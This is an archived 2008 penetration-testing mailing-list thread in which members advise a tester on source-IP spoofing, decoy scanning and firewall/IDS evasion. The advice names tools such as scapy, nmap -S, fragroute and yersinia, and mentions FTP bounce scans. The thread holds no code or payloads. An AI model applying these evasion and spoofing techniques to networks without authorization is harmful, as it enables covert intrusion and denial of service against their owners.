From: Kish Pent (kish_pent@yahoo.com)
Date: Fri Jan 04 2008 - 05:10:56 EST
Hey Ravi,
Hope you got the basic idea, you need a tool like
scapy for packet crafting attacks, you can't do much
with nmap for packet crafting, even though you're
mentioning a new word now... to spoof with nmap is
possible using the -S option. Basically stop using
automated tools like Nessus for a penetration test.
Nessus is recommended if you're on a pen-test with
considerable amount of machines. I've seen a lot of
people misconcept and use nessus in web-pen tests will
all options enabled (SQL injection checks and other
relevant checks are enough)
If you want to check what device is sitting in between
you and the target, do some network device testing
using tools like yersinia or fragroute. You can
ofcourse use scapy very well, provided you know some
python scripting.
There's a considerable amount of things that must be
in place to get things right. For now I'll conclude
saying that "don't use nessus" for one host or two
hosts and use other tools like amap,nmap and firewalk
in conjunction with nessus or use them inside nessus
(results or just the tool itself).
There's a book on Nessus called Nessus Network
Auditing, from Syngress while you can alternately read
their documentation. If your goal is to spoof, just
spoof don't scan with Nessus or Nmap.
If you're in doubt, refer to the nmap documentation
here about Firewall / IDS evasion.
http://insecure.org/nmap/man/man-bypass-firewalls-ids.html
Cheers :)
Kish
--- Rolando Ruiz <jayro2809@gmail.com> wrote:
> Would bouncing the scan of a, say FTP server do what
> you want it to? All
> you're looking to do is make it seem as if it's
> coming from another host,
> right?
>
> On Dec 31, 2007 12:29 AM, Ravi <whitehaat@gmail.com>
> wrote:
>
> >
> > Hi Kish & list,
> >
> > I'm kinda looking to do a decoy scanning with
> traffic similar to Nessus.
> > I understand I can't do decoy scanning with
> Nessus. So if there is a
> > tool that could send malicious traffic like Nessus
> to my target that
> > would be it!!! I'm basically trying to test a
> network that blocks my IP
> > when I scan with Nessus. I want to prove to
> customer that I can spoof a
> > source IP that would be blocked by your IPS
> leading to a DoS issue.
> >
> > Thax.
> >
> > Kish Pent wrote:
> > > Hey ,
> > >
> > > You must define what you mean by malicious
> traffic
> > > before crafting it, based on which the tool can
> be
> > > selected. Your aim is to send malformed packets
> which
> > > in other words you're trying to interpret as
> malicious
> > > traffic. By the way, nmap is no example for
> sending
> > > malicious traffic. Scapy is a very good packet
> > > crafting tool, and it can be used for subsequent
> > > port-scanning, protocol analysis, and best of
> all,
> > > it's just THE tool for packets. (it can do what
> hping
> > > can do for you, it can do what nmap,unicornscan
> or
> > > some other tools can do for you)
> > >
> > > You might also want to check out the
> www.secdev.org
> > > website, Philippe Biondi from EADS has written
> the
> > > tool, and given some excellent docs and ppt(s)
> out
> > > there.
> > >
> > > Cheers :)
> > > Kish
> > >
> > > --- Ravi <whitehaat@gmail.com> wrote:
> > >
> > >
> > >> Hi guys...
> > >>
> > >> Can anybody help me in finding a tool like
> 'nmap-(-D
> > >> decoy)' which can
> > >> send some malicious content to a system...
> > >>
> > >>
> > >>
> > >> Thanks & Regards,
> > >>
> > >> Whitehaat
> > >>
> > >>
> > >>
> > >>
> > >>
> > >
>
------------------------------------------------------------------------
> > >
> > >>
> > >
> > >
> > > --
> > > Kishore, Penetration Tester,
> > > 17/1,Upstairs,Sarojini St,
> > > Smart Security, T.Nagar,
> > > Chennai - 600 017
> > >
> > > Phone: 91 98841 80767
--
Kishore, Penetration Tester,
17/1,Upstairs,Sarojini St,
Smart Security, T.Nagar,
Chennai - 600 017
Phone: 91 98841 80767
____________________________________________________________________________________
Be a better friend, newshound, and
know-it-all with Yahoo! Mobile. Try it now. http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:18 EDT